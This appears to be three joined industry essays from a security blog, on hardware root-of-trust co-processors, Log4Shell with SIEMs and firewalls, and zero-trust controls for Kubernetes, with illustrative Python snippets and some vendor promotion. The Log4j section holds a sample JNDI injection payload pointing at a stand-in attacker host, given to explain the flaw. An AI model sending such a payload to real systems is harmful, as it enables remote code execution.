Cybersecurity has never felt more porous. You are no doubt aware of the grim statistics:

• The average cost of a data breach rose year-over-year from $3.86 million to $4.24 million in 2021, according to IBM.

• The majority of cyberattacks result in damages of $500,000 or more, Cisco says.

• A sobering analysis by Cybersecurity Ventures forecasts that the global cost of ransomware attacks will reach $265 billion annually by 2031.

• The FBI reports that 3,000-4,000 cyberattacks are counted each day.

That’s just a sample of what is obvious to anyone in the industry: we’re in a war with cybercriminals, and we can hardly say we’re winning.

Internet security vulnerabilities, once mostly a nuisance, have become dangerous and costly. Data privacy breaches expose sensitive details about customers, staff, and company financials. Security software may have been a satisfactory product at the turn of the century, but despite massive levels of investment, many experts now realize it is not adequate for dealing with contemporary threats.

We reached this point of friction because of the compound effect of two shortcomings. First, security was too often treated as an afterthought by the industry, taking a backseat to a device’s speed, functionality, and design. Security remains an added expense that isn’t easy to market, especially when third-party software solutions have been so widely adopted.

But those software solutions have proven undependable and often require patches or upgrades that are costly to the end user. Second, the design of security solutions struggled to scale up or adapt to technological changes in the industry, especially in disaggregated compute networks.

Meanwhile, the attack surface keeps broadening with the increasing interconnectivity of services, product chains, and user interfaces. Seeing the flaws continue year after year, the industry began linking authentication of valid software components to the underlying hardware, or the “root of trust.”

This approach allows for compromised software to be identified during the authentication process. However, hackers have attacked unsecured hardware and compromised this root. Thus, secure implementations are critical.
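To make that idea concrete, here is a minimal, illustrative sketch of boot-chain verification anchored in a hardware root of trust: each software stage is measured (hashed) and checked against golden values held in tamper-resistant hardware before control is handed over. The stage names and digests are hypothetical placeholders; real implementations live in silicon and boot firmware, not application-level Python.

```python
# A minimal, illustrative sketch of boot-chain verification anchored in a
# hardware root of trust. Stage names and digests are hypothetical
# placeholders; real implementations live in silicon and boot firmware.
import hashlib
from hmac import compare_digest

# "Golden" measurements provisioned at manufacture and held in
# tamper-resistant hardware storage.
TRUSTED_MEASUREMENTS = {
    "bootloader": "placeholder-digest-1",
    "kernel": "placeholder-digest-2",
}

def measure(image: bytes) -> str:
    """Hash a software image to produce its measurement."""
    return hashlib.sha256(image).hexdigest()

def verify_boot_chain(stages: list[tuple[str, bytes]]) -> bool:
    """Check every boot stage against its golden value; halt on any mismatch,
    which is how compromised software gets caught during authentication."""
    for name, image in stages:
        expected = TRUSTED_MEASUREMENTS.get(name)
        if expected is None or not compare_digest(measure(image), expected):
            print(f"halt: {name} failed attestation")
            return False
        print(f"{name} verified; handing off to next stage")
    return True

# With placeholder digests this refuses to boot, which is the point:
verify_boot_chain([("bootloader", b"tampered image")])
```

The scheme is only as strong as the hardware holding the golden values, which is why attacks on unsecured hardware undermine the whole chain.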

Compounding the problem is the nature of threat response: it is reactive, searching for known threats, while cybercriminals regularly devise new, surreptitious methods to avoid detection. Too frequently, security upgrades occur only after successful attacks have taken place, and most fixes cannot stand up to a new type of attack.

The good news is that artificial intelligence is here and showing great promise to deliver what the market needs: pre-emptive, proactive threat detection. AI is on the verge of providing a remedy for problems that have seemed insurmountable. New AI-based applications are poised to be game-changers for cybersecurity.

Implementing security solutions such as a secure hardware root-of-trust and proactive AI piecemeal, across multiple compute-processor vendors, creates complexity and increases the attack surface for cybercriminals. Varying implementation quality can introduce further deficiencies.

Ideally, these security measures can be offloaded to a dedicated security co-processor residing in the control and management plane, separated from the data plane of the main processors. Such a co-processor would be positioned to act as a security watchdog for the entire system and provide a pre-emptive measure to fight cybercrime.

At Axiado, we believe an AI-driven trusted control/compute unit, or TCU, provides the level of protection the data-communications industry is demanding. The TCU is designed as a stand-alone processor that will reside on a motherboard next to a CPU, GPU or other compute engine.

This security-by-design solution for the control and management plane is based on proprietary Axiado technology, including Secure Vault™ (a secure hardware root-of-trust, cryptography engine and secure key/certificate storage), Secure AI™ (a pre-emptive threat-detection hardware engine), and firewall advancements.

Hardware with a TCU included will allow companies to pre-emptively detect threats and reduce the endless stream of often-inadequate security patches they have been forced to rely on for years.

Cybercriminals are nimble, use up-to-date software, and are determined. With an unprecedented number of attacks inundating global databases, it is time to counter these threats with an AI-assisted hardware solution that denies cybercriminals entry into networks and the precious data they store.

About the essayist: Gopi Sirineni is the CEO of Axiado, which supplies advanced technologies to secure the hardware root of trust.

Log4j is the latest, greatest vulnerability to demonstrate just how tenuous the security of modern networks has become.

Log4j, aka Log4Shell, blasted a surgical light on the multiplying tiers of attack vectors arising from enterprises’ deepening reliance on open-source software.

Related: The exposures created by API proliferation

This is all part of corporations plunging into the near future: migration to cloud-based IT infrastructure is in high gear, complexity is mushrooming and fear of falling behind is keeping the competitive heat on. In this heady environment, open-source networking components like Log4j spell opportunity for threat actors. It’s notable that open-source software vulnerabilities comprise just one of several paths ripe for malicious manipulation.

By no means has the cybersecurity community been blind to the complex security challenges spinning out of digital transformation. A methodical drive has been underway for at least the past decade to effect a transition to a new network security paradigm – one less rooted in the past and better suited for what’s coming next.

Log4j shines a light on a couple of solidifying developments. It reinforces the notion that a new portfolio of cloud-centric security frameworks must take hold, the sooner the better. What’s more, it will likely take a blend of legacy security technologies – in advanced iterations – combined with a new class of smart security tools to cut through the complexities of defending contemporary business networks.

I’ve recently had several deep-dive discussions with cybersecurity experts at Juniper Networks, about this. The Sunnyvale, Calif.-based networking systems supplier, like any number of other established tech giants, as well as innumerable cybersecurity startups, is deeply vested in seeing this transition through to the end. Here are key takeaways:

Messy co-dependencies

It’s ironic that open-source software is steeped in altruism. In the early days of the Internet, coders created new programs for the sake of writing good code, then made it available for anyone to use and extend, license free. However, once the commercial Internet took hold, developers began leveraging open-source components far and wide in proprietary systems.

Open-source vulnerabilities in enterprise networks have since become a massive security blind spot. Log4j was preceded by JBoss, Poodle, Shellshock and Heartbleed. These were all obscure open-source components that, over time, became deeply embedded in enterprise systems across the breadth of the Internet, only to have a gaping vulnerability discovered in them late in the game.

Log4j, for instance, is a ubiquitous logging library. Its rather mundane function is to record events in a log for a system administrator to review and act upon later. Log4Shell now refers to the family of vulnerabilities — and related exploits — unearthed last December by a white hat researcher at Alibaba, the Chinese tech giant. Left unpatched, Log4Shell vulnerabilities present easy paths for a threat actor to take full control of the underlying system.
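To make the mechanics concrete, here is an illustrative Python sketch of the pattern behind Log4Shell. Log4j itself is Java, and this is not its actual code; the point is the vulnerable behavior, in which the logger evaluated ${...} lookup expressions found in untrusted input rather than treating them as inert text.

```python
# An illustrative sketch of the Log4Shell pattern (Log4j itself is Java;
# this is not its actual code). The vulnerable behavior: the logger
# evaluated ${...} lookup expressions embedded in untrusted input.
import re

def resolve_lookup(expr: str) -> str:
    # Log4j supported ${...} lookups, including JNDI lookups such as
    # ${jndi:ldap://attacker.example/x}, which could load remote attacker code.
    if expr.startswith("jndi:"):
        return "<remote lookup performed -- attacker controlled>"
    return expr

def vulnerable_log(message: str) -> str:
    # Expands every ${...} in the logged message, even inside user input.
    return re.sub(r"\$\{([^}]*)\}", lambda m: resolve_lookup(m.group(1)), message)

# A request header that a server dutifully logs:
user_agent = "${jndi:ldap://attacker.example/x}"
print(vulnerable_log("client connected, UA=" + user_agent))
# The fix: treat logged content as inert data, never as expressions to evaluate.
```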

The bigger picture, says Mike Spanbauer, security evangelist at Juniper Networks, is that enterprises to this day continue to deploy open-source components without consistent rigor, lacking the formal infusion of security quality-assurance coding practices. Gaping security holes regularly get discovered by hackers – both white hat and black hat – probing randomly for soft spots.

Expediency and cost savings drove commercial adoption of open-source components in the early days of the commercial Internet. And the very same mindset persists today, perhaps even more so, as companies increasingly rely on open-source software to keep pace, observes Kate Adam, Juniper Networks’ senior director of security product marketing.

“This is an established practice that’s now influencing in a new way due to how the business environment has shifted,” Adam says. The intensely competitive cybersecurity talent market is partly to blame here. Companies increasingly reach for off-the-shelf open-source components, Adam says, to some degree because of the scarcity of skilled coders, especially those steeped in security.

“Some enterprises never use anything open-source and always do everything themselves, but that’s a massive undertaking, and they’re in a tiny minority,” she says. Indeed, according to the Linux Foundation, as much as 80 percent of the code in current applications is open source, often buried deep.

Log4Shell illuminated the security snarls and tangles created by software co-dependencies that, in many organizations, have congealed into a chaotic, indecipherable mess. Here’s how Spanbauer describes what this looks like — from the perspective of an enterprise’s IT and security teams.

“How a given open-source library works in a specific app can be a mystery because arbitrary parties contributed pieces of coding that may or may not have been documented,” he says. “This makes for very flexible, very agile code, but there is also an absence of the data that you need for your security models — to determine how to best protect the assets you’re responsible for . . . This is the current state of affairs for practically every organization, almost without exception. And these types of co-dependencies are here to stay. They’re now the norm and security teams must assess and manage the risk of these stacks.”

Legacy tech’s role

Log4Shell actually contributes to progress in this sense: it heightens awareness, which should help accelerate the transition to a much-needed new security paradigm. Many more Gordian-knot issues need to be dealt with, to be sure. Complex and evolving cyber risks need to be resolved, for instance, when it comes to securing human and machine identities, tightening supply chains, mitigating third-party risks, protecting critical infrastructure and preserving individuals’ privacy.

Emerging frameworks, like Zero Trust Network Access (ZTNA), Cloud Workload Protection Platform (CWPP), Cloud Security Posture Management (CSPM) and Secure Access Service Edge (SASE), aim to help mitigate this spectrum of intensifying risks. Frameworks like these serve as guideposts. The task at hand is to steer the center of gravity for securing networks to the Internet edge, where cloud-centric resources and services increasingly reside.

This trend is well underway, and the handwriting is on the wall for many costly cybersecurity tools and services that were first installed 20 years ago to protect on-premises datacenters: obsolescence is on the near horizon. That said, a couple of prominent legacy technologies seem sure to endure as security cornerstones, moving forward. I’m referring to Security Information and Event Management (SIEM) systems and to firewalls.

SIEMs failed to live up to their hype in the decade after they were first introduced in 2005. Then about five years ago SIEMs got recast as the ideal mechanism for ingesting event log data arriving from Internet traffic, corporate hardware, mobile and IoT devices and cloud-hosted resources — the stuff of digital transformation.

This rejuvenation of SIEMs coincided with the emergence of advanced data analytics tools that could make more effective use of SIEM event logs; system orchestration became streamlined, human behavior got factored in and incident response became automated.
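As a toy illustration of that ingest-and-correlate role (the field names and threshold below are invented for illustration, not any vendor’s schema), a SIEM’s value comes from spotting patterns across log sources that no single device would flag on its own:

```python
# A toy sketch of the SIEM ingest-and-correlate role described above.
# Field names and the threshold are invented, not any vendor's schema.
from collections import Counter
from dataclasses import dataclass

@dataclass
class Event:
    source: str   # e.g. "vpn", "firewall", "cloud-audit"
    actor: str    # the user or IP the event is attributed to
    action: str   # e.g. "login_failed", "login_ok"

def correlate(events: list[Event], threshold: int = 5) -> list[str]:
    """Flag actors with repeated failed logins across all log sources --
    the cross-source view no single device log provides on its own."""
    failures = Counter(e.actor for e in events if e.action == "login_failed")
    return [f"possible brute force by {actor} ({count} failures)"
            for actor, count in failures.items() if count >= threshold]

stream = [Event("vpn", "10.0.0.7", "login_failed")] * 6
stream.append(Event("cloud-audit", "alice", "login_ok"))
for alert in correlate(stream):
    print(alert)  # an automated playbook might open a ticket or block the IP
```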

As cloud-hosted processing power and data storage have gained more traction, the role of on-premises data centers has declined. Yet legacy protections for on-premises data centers continue to predominate. The unhappy result: cyber exposures — and successful network breaches – have continued to scale up.

Log4Shell is just the latest reminder that gaping security holes lie dormant everywhere, just waiting to be discovered and exploited, in both cloud and on-premises environments. Consider how ransomware has thrived in the transitional environment we’re now in, and how cyber espionage and cyber warfare have come to factor into geopolitical power struggles.

“Having the requisite technology to protect the data center and the edge actually is not enough, in and of itself,” Adam observes. “It’s now vital to be able to see the entire environment and respond to anomalies in near real time. SIEMs have become so popular because they pull everything together through logs.”

Visibility is vital

Where is this all taking us? New security frameworks, like ZTNA, CWPP, CSPM, and SASE, are the blueprints for networks where the event logs ingested by SIEMs get put to higher uses: detecting and responding to legitimate threats. This will come to fruition on smarter platforms using automated tools, including advanced firewalls.

Firewalls predate SIEMs, arriving on day one of companies connecting their networks to the Internet. While a SIEM ingests event logs for analysis, a firewall filters traffic flowing in and out of a network.

The earliest firewalls filtered the tiny packets of data exchanged between applications, allowing only the packets that met certain criteria to pass through. This became the basis for blacklisting traffic originating from known bad IP addresses and for restricting employees from connecting to malicious webpages.
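A minimal sketch of that early packet-filtering logic, using made-up rules and documentation-range IP addresses, might look like this:

```python
# A minimal sketch of early packet filtering as described above: pass or drop
# each packet purely on header fields against a static rule set. The rules
# and addresses (IETF documentation ranges) are made up for illustration.
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

@dataclass
class Packet:
    src: str     # source IP address
    dst: str     # destination IP address
    port: int    # destination port
    proto: str   # "tcp" or "udp"

BLACKLIST = [ip_network("203.0.113.0/24")]   # known-bad address range
ALLOWED_PORTS = {25, 80, 443}                # mail and web only

def filter_packet(pkt: Packet) -> bool:
    """Return True to pass the packet, False to drop it."""
    if any(ip_address(pkt.src) in net for net in BLACKLIST):
        return False                      # drop traffic from known bad sources
    return pkt.port in ALLOWED_PORTS      # pass only permitted service ports

print(filter_packet(Packet("203.0.113.9", "198.51.100.2", 443, "tcp")))  # False
print(filter_packet(Packet("192.0.2.10", "198.51.100.2", 443, "tcp")))   # True
```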

Next Generation Firewalls (NGFW) came along in approximately the same time frame as the earliest SIEM systems. NGFWs could conduct deeper, much more detailed packet filtering and soon began taking on more advanced functionalities. NGFWs today can enforce security policies at the application, port, and protocol levels – often detecting and blocking the stealthiest malware from slipping into a network.

The evolution of firewalls, in fact, has never really slowed down and is continuing apace. Firewalls today come in an array of form factors; they’re available as an on-premises appliance, they can be set up to run virtually, or they can even be delivered as a subscription service.

“You can’t protect what you can’t see,” Spanbauer says. “Visibility is the key. Companies today, at a minimum, need a way to accurately detect potentially malicious events in a highly complex environment, one that’s only getting more complex. When it comes to visibility, a SIEM helps me see as much data as possible, and a firewall helps me to enforce policy and ensure the accuracy of my verdicts. It’s vital to eliminate any false positives, otherwise I’d just be adding to the chaos and creating more work for teams to investigate.”

SIEMs and firewalls clearly will remain at the core of bringing machine learning and leading-edge analytics to bear in the data-rich environment we’re in. “These legacy technologies are going to have a place for a very long time to come — helping companies to more effectively manage this transition and to limit the chaos as much as possible,” Adam says.

It’s logical for SIEMs and firewalls to play ever larger roles in automating detection and response tasks as part of helping enterprises cut through the complexity and calm the chaos — and materially raise the bar for network security.  I’ll keep watch and keep reporting.

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

Some 96 percent of organizations — according to the recently released 2021 Cloud Native Survey — are either using or evaluating Kubernetes in their production environment, demonstrating that enthusiasm for cloud native technologies has, in the words of the report’s authors, “crossed the adoption chasm.”

Related: The targeting of supply-chain security holes

It’s easy to understand why a cloud-native approach elicits such fervor. By using flexible, modular container technologies such as Kubernetes and microservices, development teams are better equipped to streamline and accelerate the application lifecycle, which in turn enables the business to deliver on their ambitious digital transformation initiatives.

However, despite cloud-native’s promise to deliver greater speed and agility, a variety of legitimate security concerns have kept IT leaders from pushing the throttle on their cloud-native agenda.

According to the most recent State of Kubernetes Security report, more than half (55 percent) of respondents reported that they have delayed deploying Kubernetes applications into production due to security concerns (up 11 percent from the year prior) while 94 percent admitted to experiencing a security incident in their Kubernetes or container environment in the past year.

It’s clear that until we can deliver security at the same velocity at which containers are built and deployed, many of our cloud-native aspirations will remain unfulfilled.

Cloud-native requirements

Traditionally, developers didn’t think much about application security until after deployment. However, as DevOps and modern development practices such as Continuous Integration and Continuous Delivery (CI/CD) have become the norm, we’ve come to appreciate that bolting security on after the fact can be a recipe for future application vulnerabilities.

Security must be ‘baked in’ rather than ‘brushed on’—and this current ethos has given rise to the DevSecOps movement where security plays a leading role in the DevOps process. However, it’s not enough to simply shoehorn these practices into the dynamic cloud-native development lifecycle.

Traditional enterprise network security relies on static firewall rules that can only be updated in maintenance windows after a change-approval process. That model breaks down in dynamic cloud environments, where applications are developed and deployed in an automated way and rules and policies are constantly in flux.

For this reason, most cloud environments come with built-in concepts like security groups and container service meshes that provide a way to control how different parts of an application share data with one another. While such methodologies might work well for simple applications, they lose their effectiveness as soon as you make a connection to or from various regions, clouds or technology stacks. For example, there is no interoperability between different cloud vendors’ security groups or different Kubernetes clusters.

Being cloud-native demands an approach that provides control and visibility across the entire application development lifecycle. A modern cloud-native security approach should tick the following three boxes:

• Dynamic: The ability to dynamically express and administer policies for controlling network traffic both to and from a Kubernetes pod should be considered table stakes, especially as software is being deployed across multiple cloud environments.

• Granular: Secure controls must extend to the ‘pod level’ of a container, not just the cluster level (see the sketch after this list). A software-defined approach makes it easier to dispense granular access controls based on pre-defined policies that connect users to authorized functionality rather than simply granting access at the network level.

• Unified: Slicing cloud-native security across multiple point solutions leaves you with a partial view. A unified policy engine should be omnidirectional and able to manage user-to-resource access (for both traditional and cloud-native applications) and resource-to-resource access (in cloud-native development environments).
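As one concrete reference point for the ‘dynamic’ and ‘granular’ boxes, Kubernetes’ built-in NetworkPolicy object can already scope traffic rules to labeled pods rather than the whole cluster. The sketch below uses the official Kubernetes Python client; the namespace, labels, and port are hypothetical. Note that, as discussed above, such policies stop at the cluster boundary; the ‘unified’, cross-cloud layer is exactly what they do not provide.

```python
# A sketch of pod-level (not just cluster-level) traffic control using the
# official Kubernetes Python client and a built-in NetworkPolicy object.
# Namespace, labels, and port are hypothetical examples.
from kubernetes import client, config

config.load_kube_config()  # assumes a configured kubeconfig

policy = client.V1NetworkPolicy(
    metadata=client.V1ObjectMeta(name="payments-ingress", namespace="prod"),
    spec=client.V1NetworkPolicySpec(
        # Scope the policy to the payments pods only -- pod level, not cluster level.
        pod_selector=client.V1LabelSelector(match_labels={"app": "payments"}),
        ingress=[client.V1NetworkPolicyIngressRule(
            # Admit traffic only from gateway-labeled pods, on one port.
            _from=[client.V1NetworkPolicyPeer(
                pod_selector=client.V1LabelSelector(match_labels={"app": "gateway"}))],
            ports=[client.V1NetworkPolicyPort(port=8443, protocol="TCP")],
        )],
        policy_types=["Ingress"],
    ),
)
client.NetworkingV1Api().create_namespaced_network_policy("prod", policy)
```

Because policies like this can be created and torn down programmatically as workloads change, the approach is dynamic rather than bound to maintenance windows.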

Cloud-native Zero Trust

A Zero Trust security approach, which applies the principle of least privilege access, assumes there is no clearly defined network perimeter. Because it’s software-defined, policies can be easily applied to systems, applications and users alike.

As one of the original vendors in the Zero Trust access market, Appgate has a long history of success in helping our customers ensure secure access as they migrate more of their applications and workloads to the cloud. To support them as they grow their cloud-native development initiatives, we recently introduced new Kubernetes access control capabilities for our flagship Appgate SDP product.

By deploying Appgate SDP natively inside a Kubernetes cluster as a “sidecar”—a helper application of sorts that runs alongside an application container in a Kubernetes pod—Zero Trust principles can be universally applied throughout the cluster, while providing fine-grained, differentiated access controls on a per-pod basis, thereby delivering greater control over service-to-service access.
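For readers unfamiliar with the sidecar pattern itself, here is a generic, hypothetical illustration using the Kubernetes Python client. This is not Appgate SDP’s actual configuration, and the image names are invented; it simply shows a helper container sharing a pod with the application container.

```python
# A generic illustration of the sidecar pattern: a helper container that runs
# alongside the application container in the same pod. NOT Appgate SDP's
# actual configuration; image and pod names are invented for illustration.
from kubernetes import client, config

config.load_kube_config()  # assumes a configured kubeconfig

pod = client.V1Pod(
    metadata=client.V1ObjectMeta(name="orders", labels={"app": "orders"}),
    spec=client.V1PodSpec(containers=[
        # The application container handles business logic only...
        client.V1Container(name="app", image="example/orders:1.0"),
        # ...while the sidecar mediates service-to-service traffic for the pod,
        # enforcing per-pod access policy before anything enters or leaves.
        client.V1Container(name="access-sidecar", image="example/policy-proxy:1.0"),
    ]),
)
client.CoreV1Api().create_namespaced_pod("prod", pod)
```

Because the sidecar shares the pod, policy enforcement travels with the workload itself, which is what enables the per-pod, service-to-service control described above.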

This effectively limits the potential attack surface and makes it more difficult for an attacker to escalate privileges in the event of a network compromise.

Organizations gain a single unified policy engine for Zero Trust access that enables them to control user-to-resource access (i.e., for remote user access) and resource-to-resource access (i.e., for containerized workloads) to streamline management and reduce complexity. This allows them to protect all users (remote, onsite and hybrid), all resources (traditional, cloud-native and legacy applications) and all environments (cloud, hybrid, multi-cloud and on-premises) with one solution.

Cloud-native application development brings enormous capacity for innovation and efficiency gains for many organizations. By embedding Zero Trust security principles into the process, we can realize the full potential of cloud-native.

About the essayist: Jawahar Sivasankaran is the President & COO of Appgate, a supplier of cybersecurity solutions for people, devices, and systems based on the principles of Zero Trust.